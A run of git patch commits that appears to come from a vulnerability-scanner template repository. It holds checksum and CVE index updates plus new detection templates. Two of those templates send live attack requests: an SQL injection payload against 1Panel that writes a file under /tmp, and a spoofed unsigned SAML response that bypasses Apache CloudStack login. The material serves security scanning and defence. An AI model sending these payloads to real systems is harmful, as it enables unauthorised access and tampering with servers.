Jul 2024 07:43:08 +0000 Subject: [PATCH 1764/1841] Auto Generated Templates Checksum [Tue Jul 30 07:43:08 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8e83a45541..2f795df8ae 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2741,7 +2741,7 @@ http/cves/2022/CVE-2022-26352.yaml:bc7654fa61427983be547e7d4d15ecae87e3cee5 http/cves/2022/CVE-2022-26564.yaml:2d0c2c8598581465620d49e3fb6230e3201b652f http/cves/2022/CVE-2022-26833.yaml:901ee9c385a94dddb37c455cc0b90607a6c4ab1a http/cves/2022/CVE-2022-26960.yaml:a1ebb500d8d1f56c40ade43e4b7f7bbcba6421eb -http/cves/2022/CVE-2022-27043.yaml:5da1decb3be06ea89d88cea6d5528b942516a870 +http/cves/2022/CVE-2022-27043.yaml:f4665b7060809891803ae338fd38a9d160f236fb http/cves/2022/CVE-2022-2733.yaml:8ff5f3ca9ce67efd0ed1d1b3589dfdc30c8707c5 http/cves/2022/CVE-2022-2756.yaml:2444e6891c59f52dc478f9adf1b064d43ca8afb9 http/cves/2022/CVE-2022-27593.yaml:148edb32eaa88b10e1c6028cae4a2bca2a5c5a57 @@ -3506,6 +3506,7 @@ http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-38289.yaml:fc8b321f6b565cc6feea194cb9265ff81d325e09 http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-39250.yaml:ff485ce5537d94dfd260abb578b3c4d85ecb3797 +http/cves/2024/CVE-2024-39903.yaml:5ca76939f32b8d5b69e0cadbeae884cdfcea172e http/cves/2024/CVE-2024-39914.yaml:2c8d9d4637d5806823bcba86390d8646d1db66bf http/cves/2024/CVE-2024-40348.yaml:e1b3c7bd1bfe293d155f1999f412eee670c8334b http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 @@ -8942,7 +8943,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:00becbaf1d12bcc68c09e89cd072bb5a9be0f737 +templates-checksum.txt:b043f00554f92ffbb656ccae56a9f3f9fad09312 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 19e718c054779bf14be9cd76a13fb9f5d3601a2d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 07:43:08 +0000 Subject: [PATCH 1765/1841] Auto Generated cves.json [Tue Jul 30 07:43:08 UTC 2024] :robot: --- cves.json | 9 ++++++++- cves.json-checksum.txt | 2 +- 2 files changed, 9 insertions(+), 2 deletions(-) diff --git a/cves.json b/cves.json index 889d524255..527989e48a 100644 --- a/cves.json +++ b/cves.json @@ -1724,6 +1724,7 @@ {"ID":"CVE-2022-26564","Info":{"Name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","Severity":"medium","Description":"HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-26564.yaml"} {"ID":"CVE-2022-26833","Info":{"Name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","Severity":"critical","Description":"An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. An attacker can send a series of HTTP requests to trigger this vulnerability.\n","Classification":{"CVSSScore":"9.4"}},"file_path":"http/cves/2022/CVE-2022-26833.yaml"} {"ID":"CVE-2022-26960","Info":{"Name":"elFinder \u003c=2.1.60 - Local File Inclusion","Severity":"critical","Description":"elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-26960.yaml"} +{"ID":"CVE-2022-27043","Info":{"Name":"Yearning - Directory Traversal","Severity":"high","Description":"Yearning has a directory traversal vulnerability that can be exploited by attackers to obtain sensitive information. The vulnerability is present in multiple versions of Yearning.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-27043.yaml"} {"ID":"CVE-2022-2733","Info":{"Name":"Openemr \u003c 7.0.0.1 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2733.yaml"} {"ID":"CVE-2022-2756","Info":{"Name":"Kavita \u003c0.5.4.1 - Server-Side Request Forgery","Severity":"medium","Description":"Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-2756.yaml"} {"ID":"CVE-2022-27593","Info":{"Name":"QNAP QTS Photo Station External Reference - Local File Inclusion","Severity":"critical","Description":"QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-27593.yaml"} @@ -2285,6 +2286,7 @@ {"ID":"CVE-2023-4415","Info":{"Name":"Ruijie RG-EW1200G Router Background - Login Bypass","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4415.yaml"} {"ID":"CVE-2023-44352","Info":{"Name":"Adobe Coldfusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44352.yaml"} {"ID":"CVE-2023-44353","Info":{"Name":"Adobe ColdFusion WDDX Deserialization Gadgets","Severity":"critical","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-44353.yaml"} +{"ID":"CVE-2023-44393","Info":{"Name":"Piwigo - Cross-Site Scripting","Severity":"medium","Description":"Piwigo is vulnerable to a reflected XSS in the admin panel where the `plugin_id` parameter is not properly sanitized.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44393.yaml"} {"ID":"CVE-2023-4450","Info":{"Name":"JeecgBoot JimuReport - Template injection","Severity":"critical","Description":"A vulnerability was found in jeecgboot JimuReport up to 1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Template Handler. The manipulation leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4450.yaml"} {"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"} {"ID":"CVE-2023-44812","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44812.yaml"} @@ -2487,6 +2489,7 @@ {"ID":"CVE-2024-38289","Info":{"Name":"TurboMeeting - Boolean-based SQL Injection","Severity":"critical","Description":"A Boolean-based SQL injection vulnerability in the \"RHUB TurboMeeting\" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-38289.yaml"} {"ID":"CVE-2024-3922","Info":{"Name":"Dokan Pro \u003c= 3.10.3 - SQL Injection","Severity":"critical","Description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3922.yaml"} {"ID":"CVE-2024-39250","Info":{"Name":"EfroTech Timetrax v8.3 - Sql Injection","Severity":"high","Description":"EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-39250.yaml"} +{"ID":"CVE-2024-39903","Info":{"Name":"Solara \u003c1.35.1 - Local File Inclusion","Severity":"high","Description":"A Local File Inclusion (LFI) vulnerability was identified in widgetti/solara, in version \u003c1.35.1, which was fixed in version 1.35.1. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../' when serving static files. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-39903.yaml"} {"ID":"CVE-2024-39914","Info":{"Name":"FOG Project \u003c 1.5.10.34 - Remote Command Execution","Severity":"critical","Description":"FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-39914.yaml"} {"ID":"CVE-2024-40348","Info":{"Name":"Bazarr \u003c 1.4.3 - Arbitrary File Read","Severity":"high","Description":"Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-40348.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} @@ -2509,9 +2512,14 @@ {"ID":"CVE-2024-5947","Info":{"Name":"Deep Sea Electronics DSE855 - Authentication Bypass","Severity":"medium","Description":"Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5947.yaml"} {"ID":"CVE-2024-6028","Info":{"Name":"Quiz Maker \u003c= 6.5.8.3 - SQL Injection","Severity":"critical","Description":"The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6028.yaml"} {"ID":"CVE-2024-6188","Info":{"Name":"TrakSYS 11.x.x - Sensitive Data Exposure","Severity":"medium","Description":"A vulnerability was found in Parsec Automation TrackSYS 11.x.x and classified as problematic. This issue affects some unknown processing of the file /TS/export/pagedefinition. The manipulation of the argument ID leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6188.yaml"} +{"ID":"CVE-2024-6205","Info":{"Name":"PayPlus Payment Gateway \u003c 6.6.9 - SQL Injection","Severity":"critical","Description":"The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6205.yaml"} {"ID":"CVE-2024-6289","Info":{"Name":"WPS Hide Login \u003c 1.9.16.4 - Hidden Login Page Disclosure","Severity":"medium","Description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6289.yaml"} +{"ID":"CVE-2024-6366","Info":{"Name":"User Profile Builder \u003c 3.11.8 - File Upload","Severity":"high","Description":"The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6366.yaml"} {"ID":"CVE-2024-6587","Info":{"Name":"LiteLLM - Server-Side Request Forgery","Severity":"high","Description":"LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6587.yaml"} {"ID":"CVE-2024-6646","Info":{"Name":"Netgear-WN604 downloadFile.php - Information Disclosure","Severity":"medium","Description":"There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-6646.yaml"} +{"ID":"CVE-2024-6746","Info":{"Name":"EasySpider 0.6.2 - Arbitrary File Read","Severity":"medium","Description":"A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \\EasySpider\\resources\\app\\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-6746.yaml"} +{"ID":"CVE-2024-6922","Info":{"Name":"Automation Anywhere Automation 360 - Server-Side Request Forgery","Severity":"high","Description":"Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6922.yaml"} +{"ID":"CVE-2024-7188","Info":{"Name":"Bylancer Quicklancer 2.4 G - SQL Injection","Severity":"high","Description":"A SQL injection vulnerability exists in the Quicklancer 2.4, GET parameter 'range2', that has time-based blind SQL injection and a boolean-based blind SQL injection, which can be exploited remotely by unauthenticated attacker to execute arbitrary SQL queries in the database.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-7188.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} @@ -2528,4 +2536,3 @@ {"ID":"CVE-2022-24706","Info":{"Name":"CouchDB Erlang Distribution - Remote Command Execution","Severity":"critical","Description":"In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2022/CVE-2022-24706.yaml"} {"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c=1.1.5 - Local Inclusion","Severity":"high","Description":"muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2022/CVE-2022-31793.yaml"} {"ID":"CVE-2023-33246","Info":{"Name":"RocketMQ \u003c= 5.1.0 - Remote Code Execution","Severity":"critical","Description":"For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2023/CVE-2023-33246.yaml"} -{"ID":"CVE-2024-6746","Info":{"Name":"EasySpider 0.6.2 - Arbitrary File Read","Severity":"medium","Description":"A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \\EasySpider\\resources\\app\\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"network/cves/2024/CVE-2024-6746.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 66199c8c0f..95a4b89a39 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -ce42dd82b18beb00b48f704ed417a948 +379d7b02d8ae7e19dec76cc7cd470aea From 356ef6c9530ad9ee0afb49e2c40c7dd5d582eb57 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 30 Jul 2024 07:44:06 +0000 Subject: [PATCH 1766/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 8baa88016e..3fba94856e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2022/CVE-2022-27043.yaml' - 'http/cves/2023/CVE-2023-44393.yaml' + - 'http/cves/2024/CVE-2024-39903.yaml' - 'http/cves/2024/CVE-2024-6205.yaml' - 'http/cves/2024/CVE-2024-6366.yaml' - 'http/cves/2024/CVE-2024-6922.yaml' From fbc0fa8c778cfe37cdb167335f14d93018627bf2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 07:44:50 +0000 Subject: [PATCH 1767/1841] Auto Template Signing [Tue Jul 30 07:44:50 UTC 2024] :robot: --- http/cves/2024/CVE-2024-39903.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-39903.yaml b/http/cves/2024/CVE-2024-39903.yaml index 439cd7cf71..cd4b446fd5 100644 --- a/http/cves/2024/CVE-2024-39903.yaml +++ b/http/cves/2024/CVE-2024-39903.yaml @@ -45,3 +45,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402205308d6c86ac73b08df043c5dec5862d91b66462ea8242dfc8ad9651a4e03a1a202203915ea148aa77b71308249fce0cf8a92d8cd7fa4e2c69d379b09a7250315fdd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8cf57b8bd0ccf5de2a19ba9ae816079e4fd867bb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Jul 2024 13:40:36 +0530 Subject: [PATCH 1768/1841] Update manage-cabinet-register.yaml --- http/misconfiguration/manage-cabinet-register.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/manage-cabinet-register.yaml b/http/misconfiguration/manage-cabinet-register.yaml index df2ca3a58a..9e13d17361 100644 --- a/http/misconfiguration/manage-cabinet-register.yaml +++ b/http/misconfiguration/manage-cabinet-register.yaml @@ -3,7 +3,7 @@ id: manage-cabinet-register info: name: Manage Cabinet Register - Exposed author: noel - severity: medium + severity: low description: | The path to the Cabinet Storage is omniapp/pages/cabinet/managecabinet.jsf?Action=1. If exposed, it gives an attacker insight into information such as Storage Volume Name, Cabinet Name, it's alias, Deployed AppServer IP Address and Port reference: From ccf11607a54e729bc9edf1066b9130c478ed981f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 30 Jul 2024 14:44:30 +0530 Subject: [PATCH 1769/1841] Create CVE-2024-39907.yaml --- http/cves/2024/CVE-2024-39907.yaml | 51 ++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 http/cves/2024/CVE-2024-39907.yaml diff --git a/http/cves/2024/CVE-2024-39907.yaml b/http/cves/2024/CVE-2024-39907.yaml new file mode 100644 index 0000000000..9ec507e63e --- /dev/null +++ b/http/cves/2024/CVE-2024-39907.yaml @@ -0,0 +1,51 @@ +id: CVE-2024-39907 + +info: + name: 1Panel SQL Injection - Authenticated + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + 1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues. + reference: + - https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-39907 + cwe-id: CWE-89 + epss-score: 0.00043 + epss-percentile: 0.09387 + metadata: + verified: true + max-request: 2 + fofa-query: icon_hash="1300107149" || icon_hash="1453309674" || cert.issuer.cn="1Panel Intermediate CA" + tags: cve,cve2024,sqli,1panel,authenticated + +variables: + username: "{{username}}" + password: "{{password}}" + +http: + - raw: + - | + POST /api/v1/auth/login HTTP/1.1 + Host: {{Hostname}} + EntranceCode: ZW50cmFuY2U= + Content-Type: application/json + + {"name":"{{username}}","password":"{{password}}","ignoreCaptcha":true,"authMethod":"session","language":"en"} + + - | + POST /api/v1/hosts/command/search HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"page":1,"pageSize":10,"groupID":0,"orderBy":"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);","order":"ascending","name":"a"} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains_all(body_2, "SQL logic error","table exp already exists") + - contains(header_1, 'psession') + condition: and From cc1b9cb73e21446fae1059a1d2fe2c8ff1bbd4a1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 30 Jul 2024 14:51:20 +0530 Subject: [PATCH 1770/1841] delete the created table --- http/cves/2024/CVE-2024-39907.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-39907.yaml b/http/cves/2024/CVE-2024-39907.yaml index 9ec507e63e..0338b96fb1 100644 --- a/http/cves/2024/CVE-2024-39907.yaml +++ b/http/cves/2024/CVE-2024-39907.yaml @@ -40,7 +40,7 @@ http: Host: {{Hostname}} Content-Type: application/json - {"page":1,"pageSize":10,"groupID":0,"orderBy":"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);","order":"ascending","name":"a"} + {"page":1,"pageSize":10,"groupID":0,"orderBy":"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;","order":"ascending","name":"a"} matchers-condition: and matchers: From 1f64309ab43d8e54a3b6b95dd0b5da5213f7880a Mon Sep 17 00:00:00 2001 From: Mathieu Geli Date: Tue, 30 Jul 2024 16:57:14 +0200 Subject: [PATCH 1771/1841] Fix typo in CVE-2024-20767.yaml --- http/cves/2024/CVE-2024-20767.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-20767.yaml b/http/cves/2024/CVE-2024-20767.yaml index ec6496cc66..22dc41dc11 100644 --- a/http/cves/2024/CVE-2024-20767.yaml +++ b/http/cves/2024/CVE-2024-20767.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 2 shodan-query: http.component:"Adobe ColdFusion" - tags: cve,cve2024,adobe,condfusion,lfr + tags: cve,cve2024,adobe,coldfusion,lfr http: - raw: @@ -53,4 +53,4 @@ http: regex: - "(.*)" internal: true -# digest: 4a0a00473045022100e6a9a13cc692e12629ce4b557e8a9cdaab2f6b3df9155e2bb4f5cac00241469b0220351a6751dda75fd857b8ac90f6cdca44f5853c3c3019070572245e97c7aec3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e6a9a13cc692e12629ce4b557e8a9cdaab2f6b3df9155e2bb4f5cac00241469b0220351a6751dda75fd857b8ac90f6cdca44f5853c3c3019070572245e97c7aec3eb:922c64590222798bb761d5b6d8e72950 From 8164e975014e0a1eec7640d18c6e4addae18f3e3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 30 Jul 2024 20:28:26 +0530 Subject: [PATCH 1772/1841] Create CVE-2024-41107.yaml --- http/cves/2024/CVE-2024-41107.yaml | 46 ++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 http/cves/2024/CVE-2024-41107.yaml diff --git a/http/cves/2024/CVE-2024-41107.yaml b/http/cves/2024/CVE-2024-41107.yaml new file mode 100644 index 0000000000..92f9fc4404 --- /dev/null +++ b/http/cves/2024/CVE-2024-41107.yaml @@ -0,0 +1,46 @@ +id: CVE-2024-41107 + +info: + name: Apache CloudStack - SAML Signature Exclusion + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + The CloudStack SAML authentication (disabled by default) does not enforce signature check. In CloudStack environments where SAML authentication is enabled, an attacker that initiates CloudStack SAML single sign-on authentication can bypass SAML authentication by submitting a spoofed SAML response with no signature and known or guessed username and other user details of a SAML-enabled CloudStack user-account + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-41107 + - http://www.openwall.com/lists/oss-security/2024/07/19/1 + - http://www.openwall.com/lists/oss-security/2024/07/19/2 + - https://cloudstack.apache.org/blog/security-release-advisory-cve-2024-41107 + - https://github.com/apache/cloudstack/issues/4519 + classification: + epss-score: 0.00046 + epss-percentile: 0.16798 + metadata: + verified: true + max-request: 1 + fofa-query: app="APACHE-CloudStack" + tags: cve,cve2024,apache,cloudstack,auth-bypass + +variables: + username: "{{username}}" + entityid: "{{entityid}}" + saml_id: "{{saml_id}}" + saml: ' {{entityid}} {{entityid}} org.apache.cloudstack urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport {{username}} ' + +http: + - raw: + - | + POST /client/api?command=samlSso HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + RelayState=undefined&SAMLResponse={{urlencode(base64(saml))}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "contains(header,'sessionkey')" + - "contains(content_type,'text/xml')" + - "status_code==302" + condition: and From 0bd27e2b0432ea52bfb9f95bb3e778d2fea1de66 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 30 Jul 2024 20:42:19 +0530 Subject: [PATCH 1773/1841] Rename http/cves/CVE-2023-5222.yaml to http/cves/2023/CVE-2023-5222.yaml --- http/cves/{ => 2023}/CVE-2023-5222.yaml | 0 1 file changed, 0 